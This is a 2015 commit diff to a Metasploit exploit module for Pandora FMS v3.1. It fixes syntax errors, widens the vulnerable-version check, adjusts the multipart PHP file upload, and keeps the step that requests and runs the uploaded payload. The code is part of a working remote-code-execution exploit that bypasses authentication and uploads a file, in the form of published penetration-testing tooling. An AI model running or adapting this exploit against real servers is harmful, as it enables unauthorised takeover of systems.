Syntax and File Upload BugFix

rcnunez · rcnunez · commit 547b7f2752cd · 2015-01-05T19:23:22.000+08:00
Fix unexpected ) in line 118
Fix file cleanup missing _
Fix more robust version check script
Fix file upload
diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb
@@ -26,12 +26,13 @@ def initialize(info={})
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Juan Galiana Lara',                     # Vulnerability discovery
-          'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module
-          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',  # Metasploit module
-          '_flood <freshbones[at]gmail.com>',      # Metasploit module
-          'mubix <mubix[at]room362.com>',          # Auth bypass and file upload
-          'egypt <egypt[at]metasploit.com>',       # Auth bypass and file upload
+          'Juan Galiana Lara',                         # Vulnerability discovery
+          'Raymond Nunez <rcnunez[at]upd.edu.ph>',     # Metasploit module
+          'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
+          'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',      # Metasploit module
+          '_flood <freshbones[at]gmail.com>',          # Metasploit module
+          'mubix <mubix[at]room362.com>',              # Auth bypass and file upload
+          'egypt <egypt[at]metasploit.com>',           # Auth bypass and file upload
         ],
       'References'     =>
         [
@@ -66,7 +67,8 @@ def check
         'uri'    => normalize_uri(base, 'index.php')
       })
       if res and res.code == 200
-        if res.body.include?("v3.1 Build PC100609")
+        #Tested on v3.1 Build PC100609 and PC100608
+        if res.body.include?("v3.1 Build PC10060")
           return Exploit::CheckCode::Vulnerable
         elsif res.body.include?("Pandora")
           return Exploit::CheckCode::Detected
@@ -90,6 +92,7 @@ def upload(base, file, cookies)
       data.add_part("images", nil, nil, 'form-data; name="directory"')
       data.add_part("1", nil, nil, 'form-data; name="upload_file"')
       data_post = data.to_s
+      data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
       res = send_request_cgi({
         'method'  => 'POST',
@@ -103,7 +106,7 @@ def upload(base, file, cookies)
         'data'    => data_post
       })
 
-      register_files_for cleanup(@fname)
+      register_files_for_cleanup(@fname)
       return res
 
     rescue ::URI::InvalidURIError
@@ -115,7 +118,7 @@ def upload(base, file, cookies)
   def exploit
 
     base   = target_uri.path
-    @fname = "#{rand_text_numeric(7)}.php")
+    @fname = "#{rand_text_numeric(7)}.php"
     cookies = ""
 
     # bypass authentication and get session cookie
@@ -156,7 +159,7 @@ def exploit
     end
 
     # retrieve and execute PHP payload
-    print_status("#{@peer} - Executing payload (images/#{@fname}")
+    print_status("#{@peer} - Executing payload (images/#{@fname})")
     begin
       res = send_request_cgi({
         'method' => 'GET',
